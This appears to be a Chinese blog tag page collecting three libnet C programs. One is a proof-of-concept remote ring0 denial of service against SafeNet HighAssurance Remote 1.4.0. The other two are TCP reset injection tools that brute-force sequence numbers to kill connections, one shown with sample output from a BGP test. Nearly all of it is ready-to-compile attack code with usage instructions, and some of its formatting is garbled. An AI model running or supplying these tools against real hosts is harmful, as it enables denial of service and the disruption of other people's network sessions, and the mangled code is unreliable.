标签 libnet 下的文章

“”

include <libnet.h>

int main (int argc, char **argv)
{
u_char *buf = NULL;

/ libnet vars /
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lnsock;
char *device = NULL;

/ packet vars /
struct ip *ip_hdr = NULL;
struct opt *opt_hdr = NULL;
u_int32_t src_ip = 0, dst_ip = 0;

printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POCn"

      "by John Anderson <john@ev6.net>\n"
      "   mu-b <mu-b@digit-labs.org>\n\n");

if (!argv[1])

{
  printf ("Usage: %s <destination> [source]\n", argv[0]);
  exit (EXIT_FAILURE);
}

/ allocate space for packet /
if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL)

{
  perror ("malloc: ");
  exit (EXIT_FAILURE);
}

/ initialise libnet /
lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
if (lnsock == NULL)

{
  fprintf (stderr, "libnet_init() failed: %s", errbuf);
  exit (-1);
}

if (!argv[2])

src_ip = lookup ("127.0.0.1");

else

src_ip = lookup (argv[2]);

dst_ip = lookup (argv[1]);

/ Build the pseudo-IPv4 header /
memset (buf, 0, sizeof buf);
ip_hdr = (struct ip *) buf;
ip_hdr->ip_v = 6;
ip_hdr->ip_hl = 0;
ip_hdr->ip_tos = 0;
ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
ip_hdr->ip_id = htons (0);
ip_hdr->ip_off = htons (0);
ip_hdr->ip_ttl = 0;
ip_hdr->ip_p = 0;
ip_hdr->ip_sum = 0;
ip_hdr->ip_src.s_addr = src_ip;
ip_hdr->ip_dst.s_addr = dst_ip;

/ Build option header with poison bytes /
opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
opt_hdr->nxt_hdr = 0x3C; / != 0x3B /
opt_hdr->opt_len = 0x07; /* length n such that:-

                             *(((u_char *)opt_hdr) + n * 2) != 0x3B &&
                             *(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 &&
                             n * 2 < IPV6_HDR_LEN + UDP_LEN */
                            /* a value of 0x00 will suffice!@$%! */

printf ("Attacking %s", argv[1]);
libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
printf (".n");

return (EXIT_SUCCESS);
}

//gcc tcp_reset.c -o tcp_reset -lnet

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <libnet.h>

void 
usage(char *prog)
{
    fprintf(stderr, "Usage: %s -s <src ip> -d <dst ip> -p <src port> -q <dst port> [-n <seq>] [-w <window size>] [-t <timeout>]\n"
        "\t-s\tsource ip address\n"
        "\t-d\tdestination ip address\n"
        "\t-p\tsource port\n"
        "\t-q\tdestination port\n"
        "\t-n\tinitial sequence number (default random)\n"
        "\t-w\twindow size (default 1000)\n"
        "\t-t\tpacket timeout (default 10000 usec)\n"
        ,prog);
    exit(-1);
}

int
main(int argc, char **argv)
{

    int             c, build_ip, opt, win = 1000, timeout = 10000;
    unsigned short  src_port = 0, dst_port = 0;
    unsigned long   src_ip = 0, dst_ip = 0, seq = 0;
    libnet_t       *l;
    libnet_ptag_t   tcp, ip;
    struct libnet_stats stat;
    char            errbuf[LIBNET_ERRBUF_SIZE];

    memset(&stat, 0, sizeof(stat));

    if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
        fprintf(stderr, "Libnet_init error: %s\n", errbuf);
        exit(-1);
    }
    while ((opt = getopt(argc, argv, "s:d:p:q:n:w:t:h")) != -1)
        switch (opt) {
        case 's':
            src_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
            break;
        case 'd':
            dst_ip = libnet_name2addr4(l, optarg, LIBNET_DONT_RESOLVE);
            break;
        case 'p':
            src_port = atoi(optarg);
            break;
        case 'q':
            dst_port = atoi(optarg);
            break;
        case 'n':
            seq = strtoul(optarg, NULL, 0);
            break;
        case 'w':
            win = atoi(optarg);
            break;
        case 't':
            timeout = atoi(optarg);
            break;
        case 'h':
        case '?':
            usage(argv[0]);
        }

    if (optind < argc)
        usage(argv[0]);

    if (!src_ip || !dst_ip || !src_port || !dst_port)
        usage(argv[0]);

    if (!seq) {
        libnet_seed_prand(l);
        seq = libnet_get_prand(LIBNET_PRu32);
    }
    for (tcp = LIBNET_PTAG_INITIALIZER, build_ip = 1; seq < 4294967296 - win; seq += win) {

        tcp = libnet_build_tcp(
                       src_port,    /* source port */
                       dst_port,    /* destination port */
                       seq,    /* sequence number */
                       0,    /* acknowledgement num */
                       TH_RST,    /* control flags */
                       31337,    /* window size */
                       0,    /* checksum */
                       0,    /* urgent pointer */
                       LIBNET_TCP_H,    /* TCP packet size */
                       NULL,    /* payload */
                       0,    /* payload size */
                       l,    /* libnet handle */
                       tcp);    /* libnet id */

        if (tcp == -1) {
            fprintf(stderr, "Libnet_build_tcp error: %s\n", libnet_geterror(l));
            goto bad;
        }
        if (build_ip) {
            build_ip = 0;
            ip = libnet_build_ipv4(
                           LIBNET_IPV4_H + LIBNET_TCP_H,    /* length */
                           0,    /* TOS */
                           666,    /* IP ID */
                           0,    /* IP Frag */
                           64,    /* TTL */
                           IPPROTO_TCP,    /* protocol */
                           0,    /* checksum */
                           src_ip,    /* source IP */
                           dst_ip,    /* destination IP */
                           NULL,    /* payload */
                           0,    /* payload size */
                           l,    /* libnet handle */
                           0);    /* libnet id */

            if (ip == -1) {
                fprintf(stderr, "Libnet_build_ipv4 error: %s\n", libnet_geterror(l));
                goto bad;
            }
        }
        if ((c = libnet_write(l)) == -1) {
            fprintf(stderr, "Libnet_write error: %s\n", libnet_geterror(l));
            goto bad;
        }
        usleep(timeout);
    }

    libnet_stats(l, &stat);
    fprintf(stderr, "Packets sent:  %d (%d bytes)\n"
        "Packet errors: %d\n",
        stat.packets_sent, stat.bytes_written, stat.packet_errors);
    libnet_destroy(l);
    exit(0);

bad:
    libnet_destroy(l);
    exit(-1);
}

Build a TCP packet - based on tcp1.c sample code from libnet-1.1.1

COMPILE:
  gcc reset-tcp.c -o reset-tcp /usr/lib/libnet.a
   be sure to modify the MAC addresses (enet_src/enet_dst) in the code, or you WILL have problems!
    EXECUTE:
  reset-tcp [interface] [src ip] [src port] [dst ip] [dst port] [window size]
    EXAMPLE (and timing packets sent with /bin/date):
      [root@orc BGP]# date; ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 65536; date
      Tue Dec 16 21:18:28 CST 2003
      Packets sent: 8192      Sequence guess: 536805376
      Packets sent: 16384     Sequence guess: 1073676288
      Packets sent: 24576     Sequence guess: 1610547200
      Packets sent: 32768     Sequence guess: 2147418112
      Packets sent: 40960     Sequence guess: 2684289024
      Packets sent: 49152     Sequence guess: 3221159936
      Packets sent: 57344     Sequence guess: 3758030848
      packets sent: 65535
      Tue Dec 16 21:18:46 CST 2003

#include <libnet.h>
#include <stdio.h>

int main(int argc, char *argv[])
{
    int c;
    unsigned long int count=0;
    unsigned long int count2=0;
    unsigned long int seqguess=0;
    unsigned long int seqstart=0;
    unsigned long int seqincrement=0;
    unsigned long int seqmax=4294967295;
    u_char *cp;
    libnet_t *l;
    libnet_ptag_t t;
    char *payload;
    char * device = argv[1];
    u_short payload_s;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    char errbuf[LIBNET_ERRBUF_SIZE];

    char sourceip[32]        = "";
    char destinationip[32]    = "";

/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
    u_char enet_src[6] = {0x00, 0x60, 0x08, 0xa1, 0x31, 0xf2};
    u_char enet_dst[6] = {0x00, 0x40, 0x2b, 0x4d, 0xf5, 0x23};
    u_char org_code[3]   = {0x00, 0x00, 0x00};

/* Its only test code, so minimal checking is performed... */
    if (argc<7) { 
      printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [window size]\n",argv[0]); 
      printf("**Be sure to re-compile with appropriate MAC addresses!!! You were warned.\n");
      exit(1);
      }

    strcpy(sourceip,argv[2]);
    src_prt = atoi(argv[3]);
    strcpy(destinationip,argv[4]);
    dst_prt = atoi(argv[5]);
    seqincrement= atoi(argv[6]);
    seqstart= 0;
    seqmax  = 4294967295;    /* 2^32 */

    payload = NULL;
    payload_s = 0;
    src_ip  = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
    dst_ip  = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);

for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
    count++; count2++;
    if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
    l = libnet_init(LIBNET_LINK,device,errbuf);
    t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
    t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
    t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);
    t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
    c = libnet_write(l);
    }
printf("packets sent: %i\n",count);
return (EXIT_FAILURE); 
}